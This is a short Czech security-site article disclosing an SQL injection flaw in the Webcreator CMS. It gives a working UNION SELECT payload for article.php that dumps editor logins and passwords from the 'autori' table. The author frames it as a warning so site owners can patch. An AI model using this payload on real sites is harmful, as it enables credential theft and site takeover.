HACK webcreatoru

Zdroj: SOOM.cz [ISSN 1804-7270]
Autor: Studna
Datum: 8.1.2007
Hodnocení/Hlasovalo: 0/0

Našel jsem chybu, pomocí které je možné nechat si vypsat redaktory v tomto RS.

Nevím, jestly tuto chybu již neobjevil, ale stejně.
Přišel jsem na ní a chci se podělit.

Tento článek slouží jenom pro uživatele tohoto RS, aby chyby opravili.

Řekl bych, že stačí pouze jedna jediná řádka a pochopí všichni(aspon ty zdatnější).

http://web-pouzivajici-webcreator.tld/article.php?id=0+*NION+SELECT+login,prava, prava,prava,login,heslo,
heslo,prava,heslo,heslo,heslo+FROM+autori+--+

*=U
Výhazí vám to všechno důležitý.
Dotaz se dá dále upravovat a třídit podle práv.

V TITLE stránky Vám to napíše:
neco - [heslo] - [login]

Tak si to běžte hnedka zabezpečit.

S pozdravem
Studna
E-Mail: booboo@centrum.cz
ICQ: 192074264

Článek nesmí být zneužíván k nelegálním účelů!!!